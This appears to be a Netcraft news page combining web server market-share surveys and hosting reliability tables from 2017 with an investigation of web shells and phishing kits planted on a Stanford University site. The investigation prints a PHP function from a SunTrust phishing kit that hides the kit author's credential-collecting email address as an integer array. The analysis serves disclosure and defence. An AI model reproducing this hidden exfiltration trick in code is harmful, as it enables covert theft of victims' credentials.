July 2017 Web Server Survey

In the July 2017 survey we received responses from 1,767,964,429 sites and 6,593,508 web-facing computers. This represents a small gain of 1.0 million sites (+0.06%) and 71,000 computers (+1.1%).

nginx growth unfaltering

A further 52,000 (+3.84%) web-facing computers were found running nginx this month, which has brought its market share up to 21.4%. It is currently the third-largest server vendor in terms of web-facing computers, but it is now only 122,000 computers away from Microsoft. With no reason to suspect that its consistently strong growth could falter soon, it is likely to take second place from Microsoft later this year.

Originally developed to solve the C10k problem, nginx has seen phenomenal growth in web-facing computers.

Originally developed to solve the C10k problem, nginx has seen phenomenal growth in web-facing computers.

nginx's market share growth was also assisted by Microsoft's loss of 6,400 computers, while Apache's gain of 7,500 computers was not enough to stop its own share falling by 0.35 percentage points. Apache is still far in the lead, though – more than 2.8 million web-facing computers currently run various versions and derivatives of the Apache httpd, giving it a 42.8% share of all web-facing computers.

Microsoft now serves more than half of all sites

In terms of hostnames, Microsoft gained 78 million sites, while Apache lost 56 million. This large shift has given Microsoft more than half of the market for the first time ever – 53.2% of all hostnames – with nearly three times as many sites as Apache has.

This marks a complete role reversal from four years ago, when Apache held 52% of the market while Microsoft had just 19.7%. That was the last time more than half of the world's websites used Apache. However, the hostnames metric is volatile, being susceptible to large swathes of automatically generated sites served from relatively few computers. These types of site are not counted in Netcraft's active sites survey, which paints a very different picture: Apache has more than six times as many active sites as Microsoft, and more than twice as many as nginx.

Notably, Apache has always held the largest share of the active sites market ever since the metric was included in our surveys in 2000. While Microsoft came within 10 percentage points of Apache's share on a few occasions last decade, it is now a long way off with only a 7.48% share, compared with Apache's share of 45.2%.

Apache 2.2 reaches end of life

Apache 2.4.27 was released on 11 July, along with Apache 2.2.34, which will be the final release in the 2.2.x legacy branch. Security patches for Apache 2.2.34 may be made available until December 2017, but no further maintenance patches or releases are anticipated.

To remain secure, sites still using Apache 2.2 will need to migrate to Apache 2.4 fairly swiftly. While it is difficult to tell exactly how many sites are running soon-to-be unsupported versions of Apache 2.2, at least 72 million sites claim to be using Apache 2.2 in their Server headers. The majority of these sites are hosted in the United States.

On the same day as the Apache releases, nginx 1.12.1 stable and nginx 1.13.3 mainline were released, with both including a simple fix for an integer overflow vulnerability in nginx's range filter module.

Not to be outdone, version 2.0.0 of Microsoft's IIS Administration API was also released in July, little more than two months after 1.1.0 hit general availability. The API is intended to make it easier to manage Microsoft IIS web servers, and the new version includes a range of "under the hood" improvements that make it easier to install and configure. The Microsoft IIS team also released a new version of URL Rewrite and made several improvements to its browser-based management portal at manage.iis.net during June.

Total number of websites

Web server market share

DeveloperJune 2017PercentJuly 2017PercentChange
Microsoft862,255,58448.80%940,029,82853.17%4.37
Apache371,461,39921.02%315,188,48017.83%-3.20
nginx239,666,34513.56%266,041,29615.05%1.48
Google20,136,3041.14%20,855,4241.18%0.04
Continue reading

Most Reliable Hosting Company Sites in June 2017

Rank Performance Graph OS Outage
hh:mm:ss
Failed
Req%
DNS Connect First
byte
Total
1 Hyve Managed Hosting Linux 0:00:00 0.000 0.083 0.0637 0.132 0.132
2 Memset Linux 0:00:00 0.000 0.138 0.064 0.239 0.385
3 Netcetera Linux 0:00:00 0.000 0.086 0.080 0.161 0.161
4 Hivelocity Linux 0:00:00 0.000 0.155 0.084 0.168 0.169
5 GoDaddy.com Inc Linux 0:00:00 0.004 0.209 0.012 0.032 0.033
6 Webair Linux 0:00:00 0.004 0.144 0.053 0.110 0.113
7 ServerStack Linux 0:00:00 0.004 0.115 0.063 0.125 0.125
8 EveryCity SmartOS 0:00:00 0.004 0.106 0.066 0.287 0.288
9 Pair Networks FreeBSD 0:00:00 0.004 0.233 0.071 0.142 0.142
10 Qube Managed Services Linux 0:00:00 0.009 0.133 0.063 0.125 0.125

See full table

Hyve Managed Hosting had the most reliable hosting company site in June, successfully responding to all of Netcraft's requests. This is Hyve's fifth consecutive top ten placement, and marks the first time it has clinched the number-one spot. The company recently announced that it is now a part of the G-Cloud 9 framework agreement which simplifies cloud technology procurement for the UK public sector. As well having its primary data centre in the UK, Hyve also has data centres in New Jersey, San Jose, Hong Kong, and Shanghai.

Memset’s site came in second place in June, also with no failed requests, but with a marginally slower average connection time. The UK-based company has had an uptime of 99.998% over the last three years. Its customers have included British government agencies such as the Home Office, Her Majesty's Revenue & Customs and the Cabinet Office.

Netcetera’s site also successfully responded to all of Netcraft's requests and took third place. This is the company's fourth top ten placement in Netcraft's rankings for 2017. Netcetera is based on the Isle of Man and provides data centre colocation, cloud hosting, dedicated servers and managed web hosting services.

Hivelocity came in fourth, also with no failed requests, but with a slightly slower average connection time than the companies in June 2017's top three. This is the company's second consecutive month with 100% response rate to Netcraft's queries.

Linux has once again dominated as the most commonly used operating system amongst the top ten hosting company websites, the only exceptions being EveryCity (SmartOS) and Pair Networks (FreeBSD).

Netcraft measures and makes available the response times of around thirty leading hosting providers' sites. The performance measurements are made at fifteen minute intervals from separate points around the internet, and averages are calculated over the immediately preceding 24 hour period.

From a customer's point of view, the percentage of failed requests is more pertinent than outages on hosting companies' own sites, as this gives a pointer to reliability of routing, and this is why we choose to rank our table by fewest failed requests, rather than shortest periods of outage. In the event the number of failed requests are equal then sites are ranked by average connection times.

Information on the measurement process and current measurements is available.

June 2017 Web Server Survey

In the June 2017 survey we received responses from 1,766,926,408 sites and 6,522,692 web-facing computers. This represents a loss of 48 million websites, although the total number of computers has grown by 118,000 (+1.8%).

All of the top three vendors lost sites in this month's survey, but all showed gains in web-facing computers. Many of the sites that disappeared were spam sites that used the .cn (China) top-level domain. Microsoft lost the largest number of sites – nearly 28 million – while Apache lost 8.9 million and nginx lost 5.4 million.

Apache still leads the market in terms of web-facing computers, but its share fell by 0.28 points to 43.1% despite gaining 33,200 additional computers. Apache also continues to lead the active sites market, and with net growth of 1.2 million active sites this month, its share has increased to 45.9%.

nginx gained the largest number of web-facing computers, increasing its total by 54,200 to 1.36 million (+4.2%), and taking its market share of computers up by 0.46 percentage points to 20.8%. It is now less than 3 percentage points behind Microsoft's share.

nginx is also still increasing its presence amongst the top million websites. This month it gained 939 top sites, in contrast to the losses felt by Apache and Microsoft, which saw 2,970 and 692 sites depart from the top million. Some of the lesser-used servers that also increased their presence in the top million included openresty, Varnish and Tengine.

Google overtakes Microsoft in active sites

Notably, Google has overtaken Microsoft in active sites – it now has 13.3 million, compared with Microsoft's 13.2 million. This gives Google a 7.8% share of the active sites market, although its share of all sites is only 1.1%.

Netcraft first started tracking Google's custom web server software as a major vendor group 10 years ago, when it was used by 2.7 million sites. Google's servers were originally grouped under Apache, as they were based on open source Apache code, but the amount of customisation warranted making a new group – and no doubt even more changes have taken place over the past 10 years. Today, there are over 20 million Google sites, around two-thirds of which are considered active. This is a much higher ratio than most other vendors see – for example, only 1.5% of the 862 million sites using Microsoft's web server software are deemed active.

The most commonly seen Google web server is GSE (Google Servlet Engine), which is used by millions of Blogger sites that use blogspot domains (e.g. funny-cats.blogspot.com and catversushuman.blogspot.ca), and also by many Blogger-powered sites that use custom domain names. GSE is also used by sites under the googledrive.com and googlegroups.com domains, along with some other Google services such as Gmail, although none has the volume of hostnames seen at Blogger.

Another Google web server is Google Frontend, which is used by hundreds of thousands of sites, including App Engine sites hosted under the appspot.com domain. This server was much more prominent in the past, as it was also used by Blogger sites before they switched to GSE. Back then, Google Frontend sites also used an acronym in their HTTP response headers (Server: GFE), but Google Frontend sites now return the full name of the server software, i.e. Server: Google Frontend.

Google Frontend is also used to serve some of Google's legacy sites and deprecated services, such as the former social networking site at jaiku.com. This was shut down by Google in 2012, and all pages on the site now use Google Frontend to serve error pages.

Another Google server – ghs – is responsible for redirecting traffic from googlepages.com sites that were created with Google Page Creator. This website creation service was shut down in 2009, but existing pages were migrated to Google Sites, which hosts user content in subdirectories under the sites.google.com hostname. When a browser visits a legacy hostname like sunsetpizza.googlepages.com, ghs will redirect the user to its new location at https://sites.google.com/site/sunsetpizza/.

Other Server headers used more sparingly by Google-hosted services include UploadServer, sffe, ESF (used by Google Docs), and gws.

Total number of websites

Web server market share

DeveloperMay 2017PercentJune 2017PercentChange
Microsoft891,000,72149.09%862,255,58448.80%-0.29
Apache380,321,10620.95%371,461,39921.02%0.07
nginx245,114,31713.50%239,666,34513.56%0.06
Google20,033,2291.10%20,136,3041.14%0.04
Continue reading

Most Reliable Hosting Company Sites in May 2017

Rank Performance Graph OS Outage
hh:mm:ss
Failed
Req%
DNS Connect First
byte
Total
1 Webair Linux 0:00:00 0.000 0.160 0.053 0.107 0.109
2 Swishmail FreeBSD 0:00:00 0.000 0.152 0.061 0.121 0.164
3 ServerStack Linux 0:00:00 0.000 0.130 0.063 0.126 0.126
4 Hivelocity Linux 0:00:00 0.000 0.168 0.085 0.169 0.169
5 GoDaddy.com Inc Linux 0:00:00 0.004 0.238 0.014 0.036 0.037
6 Hyve Managed Hosting Linux 0:00:00 0.004 0.096 0.062 0.128 0.128
7 Qube Managed Services Linux 0:00:00 0.004 0.150 0.063 0.126 0.126
8 www.choopa.com Linux 0:00:00 0.008 0.226 0.006 0.150 0.150
9 Memset Linux 0:00:00 0.008 0.152 0.062 0.440 0.570
10 Pair Networks FreeBSD 0:00:00 0.008 0.254 0.076 0.147 0.147

See full table

Four hosting companies responded successfully to all of Netcraft's requests during May: Webair, Swishmail, ServerStack and Hivelocity.

Webair had the lowest average connection time out of the four, and so took first place in May’s rankings. This is the first time the cloud hosting company's site has topped Netcraft's Most Reliable Hosting Company Sites ranking, but marks its fourth consecutive month in the top ten. Webair recently announced a partnership with Microsoft to offer Azure ExpressRoute, which creates a direct network connection between Webair and the Microsoft Cloud.

Swishmail's site has retained its second place position in Netcraft's ranking from April. Similarly to last month, Swishmail narrowly missed out on the top spot based on its average connection time despite having as many successful requests. The US-based company provides FreeBSD-based email and web hosting services.

ServerStack came in third, with a slightly longer average connection time than both Webair and Swishmail's site, but still no failed requests. ServerStack offers fully managed services which include software installation, proactive monitoring, automated backups, performance optimisation, troubleshooting, and virtualisation.

Hivelocity came fourth after responding successfully to all of Netcraft's requests. The hosting provider has three US-based data centres: two in Tampa, Florida and a third one in Atlanta.

Linux continues to be the predominantly used operating system, powering eight of the top ten sites. The only exceptions are Swishmail and Pair Networks which both run FreeBSD.

Netcraft measures and makes available the response times of around thirty leading hosting providers' sites. The performance measurements are made at fifteen minute intervals from separate points around the internet, and averages are calculated over the immediately preceding 24 hour period.

From a customer's point of view, the percentage of failed requests is more pertinent than outages on hosting companies' own sites, as this gives a pointer to reliability of routing, and this is why we choose to rank our table by fewest failed requests, rather than shortest periods of outage. In the event the number of failed requests are equal then sites are ranked by average connection times.

Information on the measurement process and current measurements is available.

Stanford Uni site infested with hacking tools and phish for months!

Stanford University has unwittingly demonstrated just how bad things can get once a website is compromised by a web shell.

Our story begins on 31 January 2017, when the website of the Paul F. Glenn Center for the Biology of Aging at Stanford University was compromised. Unfortunately, the only people who seemed to notice this at the time were other hackers, who subsequently exploited the compromise to deploy several phishing sites, hacking tools and defacement pages on glennlaboratories.stanford.edu over the following months.

During the January compromise, a hacker placed a rudimentary PHP web shell into the top-level directory of the website. The shell was named wp_conffig.php in an attempt to blend in with the rest of the WordPress software that the site uses. This naming scheme was evidently successful at avoiding detection by Stanford's website administrators, as the PHP shell was still accessible 4 months later:

This rudimentary PHP shell was installed in January and is still on the server at the time of writing. It allows attackers to upload files and execute arbitrary commands on the Stanford web server. No authentication is required, so literally anybody can use this page.

This rudimentary PHP shell was installed in January and was still on the server at the time of writing. It allowed attackers to upload files and execute arbitrary commands on the Stanford web server. No authentication was required, so literally anybody could have used this page.

While WordPress has a bad history with regard to phishing, it is worth pointing out that the Stanford site has been running the latest release of WordPress (4.7.5) since 20 April 2017, and so without further investigation, the original route of compromise is not apparent. However, with an anonymously accessible web shell on the server since January, further compromises were inevitable...

By 14 May 2017, a second web shell had been uploaded to the server. This was based on the WSO (Web Shell by Orb) script, which displays directory listings and offers several other hacking tools that can be used to crack passwords and gain access to databases. Again, the hacker tried to make this web shell harder to notice by calling it config.php.

The second web shell uploaded to the Stanford site has many more features than the first. This one can also be accessed without needing a password. The timestamps next to each file allow a likely timeline of events to be reconstructed.

The second web shell uploaded to the Stanford site has many more features than the first. This one can also be accessed without needing a password. The timestamps next to each file allow a likely timeline of events to be reconstructed.

The WSO shell makes it apparent that the Debian server is not running the latest version of PHP. While there might not have been any unpatched security vulnerabilities that were serious enough to allow compromise, it at least demonstrates a lack of attention to security.

Six minutes later, the hacker uploaded an HTML file named Alarg53.html. This simply displayed the message "Hacked By Alarg53":

The second hacker was keen to claim responsibility for the compromise.

The second hacker was keen to claim responsibility for the compromise.

Similar "Hacked By Alarg53" defacement pages can be found on dozens of other websites, which suggests the hacker is well versed at using web shells to compromise websites.

Several hours later, a hacker – possibly the same one – uploaded two more PHP scripts to the server. The first of these scripts was w3mailer.php, which can be used to send large amounts of spam – ideal for sending lots of phishing emails.

The PHP Emailer SMTP script by Predator. This can be used to send phishing emails from the compromised Stanford University web server.

The PHP Emailer SMTP script by Predator. This can be used to send phishing emails from the compromised Stanford University web server.

Incidentally, the PHP Emailer script contains the following obfuscated JavaScript, which is unwittingly executed whenever the page is accessed by the hacker who uploaded it.

This client-side code in the PHP Mailer script attempts to download and execute a remote JavaScript file. It is obfuscated to keep this fact secret from the hacker who uploaded the script.

This client-side code in the PHP Mailer script attempts to download and execute a remote JavaScript file. It is obfuscated to keep this fact secret from the hacker who uploaded the script.

When the code is de-obfuscated, it can be seen that it causes an externally-hosted JavaScript file to be downloaded; however, the site on which this third-party script is located is currently down. Nonetheless, it illustrates one of the ways in which the authors of these hacking tools can quickly find out where other hackers have deployed them. The author can then monetize the situation by selling the URL of the deployed tool, which will attract new hackers to the compromised server.

The de-obfuscated JavaScript shows how it attempts to load an externally hosted script.

The de-obfuscated JavaScript shows how it attempts to load an externally hosted script.

The other PHP script – promailer.php – was uploaded five minutes later. It provides similar functionality to the previously uploaded script, but does not contain any nefarious JavaScript.

This Pro Mailer V2 script is a safer choice for the hacker, as it does not execute JavaScript from external websites.

This Pro Mailer V2 script is a safer choice for the hacker, as it does not execute JavaScript from external websites.

The following day, an unknown hacker uploaded an archive named 1.zip into the top-level directory of the compromised Stanford website. This archive was unzipped on the server to instantly deploy a Chinese HiNet phishing site, designed to steal webmail credentials from customers of this Chunghwa Telecom internet service.

This may have been the first phishing site to be deployed on the compromised Stanford University website. It redirects victims to the real hinet.net website after it has stolen their credentials. It is possible that other phishing sites existed before this but were deleted by subsequent hackers.

This may have been the first phishing site to be deployed on the compromised Stanford University website. It redirects victims to the real hinet.net website after it has stolen their credentials. It is possible that other phishing sites existed before this but were deleted by subsequent hackers.

A few days later, on 21 May, a new hacker decided to leave his trace on the server by uploading another defacement page called TFS.html. This demonstrates that at least two separate hackers have compromised the server this month alone, possibly by making use of the hacking tools that already existed on it.

Another defacement page uploaded to the Stanford University site by a different hacker.

Another defacement page uploaded to the Stanford University site by a different hacker.

Another HiNet phishing site was also deployed on the compromised server later that day.

After another short lull in fraudulent activity, two more archives were uploaded on 23 May: i.zip and linkedin.zip. These were extracted to multiple locations to create several phishing sites that targeted users of Office365 and LinkedIn.

The Office 365 phishing site. It simply steals a victim's credentials before redirecting them to the real Office365 login page at login.microsoftonline.com.

The Office 365 phishing site. It simply steals a victim's credentials before redirecting them to the real Office365 login page at login.microsoftonline.com.

One of the LinkedIn phishing sites. Like the other phishing sites, it only attempts to steal a victim's username and password before redirecting them to the real site at https://www.linkedin.com/.

One of the LinkedIn phishing sites. Like the other phishing sites, it only attempts to steal a victim's username and password before redirecting them to the real site at https://www.linkedin.com/.

The following day, another archive – KC.zip – was uploaded to the compromised server. This contained a generic phishing kit that is designed to steal a victim's email address and password, without impersonating any particular brand.

The generic phishing site after it had been deployed on the Stanford server.

The generic phishing site after it had been deployed on the Stanford server.

Regardless of what is entered into the above form, the victim will always be told that there was a login error, and that they should go back and try again. This could cause victims to try submitting different username and password combinations, giving the attacker an even greater haul of stolen credentials that might work on other websites. Each time the form is submitted, the victim's email address and password is emailed to a pair of Gmail addresses.

The generic phishing kit is configured to send stolen credentials to the same pair of Gmail addresses as the LinkedIn phishing kit, which obviously suggests that they were uploaded by the same fraudster.

Yet another phishing kit – ileowosun.zip – was uploaded to the server on 27 May. This one impersonated a SunTrust Bank login form, but used a completely different set of email addresses to collect victims' account details. This suggests yet another fraudster could have been responsible for deploying this phishing site.

This convincing SunTrust Bank phishing site was deployed on 27 May, after Netcraft had alerted the Center's director.

This convincing SunTrust Bank phishing site was deployed on 27 May, after Netcraft had alerted the Center's director.

Interestingly, one of the PHP scripts in the SunTrust phishing kit contains the following function, which is rather more dubious than the comment and function name might suggest:

// Function to get country and country sort;
function country_sort(){
    $sorter = "";
    $array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
        $count = count($array);
        for ($i = 0; $i < $count; $i++) {
            $sorter .= chr($array[$i]);
        }
    return array($sorter, $GLOBALS['recipient']);
}

The array of integers declared in this function is decoded to yield the email address resultbox14@gmail.com. Phishing kit authors often use tricks like these to hide their own email addresses in their kits. This allows them to receive credentials from all future deployments of the kit, while letting other fraudsters do the hard work of finding compromised servers on which to deploy the kits. By disguising the author's "secret" email address within a legitimate-looking function, most fraudsters who deploy the kit are unlikely to delete or alter the nefarious code.

Interestingly, the KC.zip and ileowosun.zip phishing kits – as well as the directories they were unzipped into – were deleted from the server around 29 May. It is not clear who did this, but no other phishing kits or hacking tools were removed, which puts the finger of suspicion on a rival fraudster.

When a compromised server has become so infested with hacking tools and phishing kits, one ironic side effect is that other fraudsters may subsequently come along and remove the existing phishing content, thus protecting some potential victims. But of course, the general trend is for more kits to be deployed on the server, and indeed, also on 29 May, a second SunTrust phishing kit was uploaded.

What went wrong?

A single Stanford University website has ended up hosting several hacking tools that have likely been used by multiple hackers to deploy a similar number of phishing sites onto the server. Failing to notice and remove the hacking tools could well have compounded the problem by facilitating the more recent compromises.

Hosting providers – including universities – can receive an alerting service from Netcraft which will notify them whenever phishing, malware, or web shells are detected on their infrastructure. Organisations targeted by high volume phishing administered via web shells may trial Netcraft's Countermeasures service.

Note: Publication of this article was delayed until Stanford University had removed the aforementioned hacking tool scripts from the website.

May 2017 Web Server Survey

In the May 2017 survey we received responses from 1,814,996,345 sites and 6,404,290 web-facing computers. Although the total number of sites has fallen slightly, by 1.4 million since April, the number of computers has grown by 83,000.

Large shifts in site counts

Although it fared well in other metrics (see below), nginx suffered a massive 30% loss of hostnames this month. With a net loss of more than 100 million sites, its market share has fallen by 5.71 percentage points to 13.5%. The majority of the sites that disappeared were Chinese-language spam sites hosted at Amazon Web Services in the United States and Japan.

Meanwhile, Microsoft gained 79 million sites, which has taken its market share up to 49.1%. This is Microsoft's highest market share in the 22-year history of the Web Server Survey, and also reflects a significant change in fortunes over the past year: Last June, Apache had the largest market share of websites, but now Microsoft's share is more than twice as large as Apache's, which fell by a further 1.73 percentage points this month to 20.95%.

nginx leads active site growth

Despite the large loss of hostnames, nginx gained nearly a million active sites, which has taken its active sites share back above 20%. This suggests most of the 104 million hostnames it lost did not have distinct content, and therefore were of little interest to ordinary web users, despite the apparent size of the change.

Apache continues to lead the active sites market quite comfortably with a 45.6% share, although a loss of 1.4 million active sites has brought this down by 0.67 percentage points. nginx stays firmly in second place, with more than twice as many active sites as Microsoft.

nginx's computer growth continues unabated

nginx's consistent computer growth has continued, making it look ever more likely to overtake Microsoft later in 2017. Its gain of 48,500 computers – combined with Microsoft's loss of 6,000 – has reduced the difference in their market shares by nearly a whole percentage point.

nginx is now within 3.46 percentage points of Microsoft's share of 23.8%; but Apache also maintains a comfortable lead in this market – it increased its web-facing computer count by 28,800 this month, keeping Apache's share above 43%.

nginx pushing others out of the top million

nginx is also continuing to make strong progress amongst the top million websites, where it has been ahead of Microsoft for the past few years. It was the only major vendor to increase its presence this month, resulting in thousands of competing vendors' websites being pushed out of the top million. Apache suffered most, with 3,200 Apache-powered sites departing the top million, but it still leads this market with a 40.5% presence.

Apache has exhibited a slow and steady decline over the past several years. Coupled with nginx's consistent growth within the top million sites, the gap between the two is ever decreasing; however, it looks like it will be a good year or two until nginx seriously starts to threaten Apache's lead.

New nginx 1.13 mainline branch

nginx 1.13.0 was released on 25th April. This is the first release on the new, actively-developed 1.13.x mainline branch, adding bugfixes and new features to what was essentially the most recent stable version of nginx (1.12.0).

The most notable new feature in nginx 1.13.0 is its support for TLS 1.3, which aims to be the latest and most secure version of the Transport Layer Security protocol – although not many underlying crypto libraries actually offer TLS 1.3 yet. The TLS 1.3 specification has not yet been finalised, although the working draft has been sufficient for some servers and clients to implement it. For example, Mozilla's NSS cryptographic library – which is used by Firefox – enables TLS 1.3 support by default.

Microsoft IIS Administration API enters general availability

The Microsoft IIS Administration API that we mentioned in February is now Generally Available. The newest 1.1.0 release also facilitates management of the IIS Central Certificate Store, and includes an improved certificate API. These features are intended to make it easier to manage certificates across entire farms of web servers.

LiteSpeed enters the Amazon cloud

LiteSpeed Technologies is now a Technology Partner in the Amazon Web Services Partner Network (APN), coinciding with the release of the LiteSpeed Web Server AMI. This Amazon Machine Image is based on CentOS 7 with the LiteSpeed Web Server pre-installed. AWS users can now use this AMI to quickly deploy ready-to-use virtual machines that run the LiteSpeed Web Server in the cloud.

This month's Web Server Survey found 6.4 million websites running LiteSpeed, which encompasses 2.3 million active sites, more than 2 million unique domain names, and nearly 11,000 web-facing computers. One of the busiest sites currently using LiteSpeed is FanFiction.Net, which is an automated fan fiction archive.

Enter the Beaver

China saw a large number of new sites being served by the relatively unknown "Beaver" web server. Just over a million sites now exhibit the Beaver Server header, and these make use of more than 110,000 unique domain names – mostly under the .cn top-level domain. Most of the sites are hosted by Aliyun, which is China's largest cloud hosting provider, while the majority of the rest are hosted by other Chinese companies. Only a single Beaver site is hosted outside of China – this solitary instance is hosted in Japan, at Amazon's Tokyo AWS region.

The behaviour of these sites suggests that Beaver might not be an entirely new web server, but possibly an application based on Microsoft's HTTP Server API (HTTPAPI 2.0). This API lets C/C++ programmers receive HTTP requests and send responses without using Microsoft IIS. At least 38 million other websites also use HTTPAPI 2.0.

But most of the Beaver sites are currently inaccessible and display the following message: "According to the filing requirements of China's Ministry of Industry and Information Technology (MIIT), the website is accessible only if the ICP information is accurate and the ICP license is filed". An ICP Filing ("Bei'an") is required by all content providers in China before they can use hosting and CDN products, but this only allows them to be used for informational purposes. A Commercial ICP Licence ("Zheng") is required for any website that sells goods or services that directly generate revenue online.

Pepyaka making the web more friendly

The little-known Pepyaka web server has also been quietly growing. This server is used predominantly by Wix, an Israeli company that provides a friendly website building platform to millions of users. Wix provides free website hosting under the *.wix.com domain, or customers can get a free custom domain name when upgrading to one of Wix's yearly premium plans.

This business model has led to a high ratio of domains to hostnames amongst the Pepyaka install base. Wix-hosted websites alone account for 1.4% of all unique domain names in use on the web, which is no mean feat. All of these sites are hosted within the Amazon Web Services cloud, using Pepyaka version 1.11.3. This version number, coupled with Wix's previous uses of nginx, suggests that it could be based on last year's mainline version of nginx.

Total number of websites

Web server market share

DeveloperApril 2017PercentMay 2017PercentChange
Microsoft812,157,80844.71%891,000,72149.09%4.38
Apache412,130,52622.69%380,321,10620.95%-1.73
nginx349,092,97519.22%245,114,31713.50%-5.71
Google19,121,6841.05%20,033,2291.10%0.05
Continue reading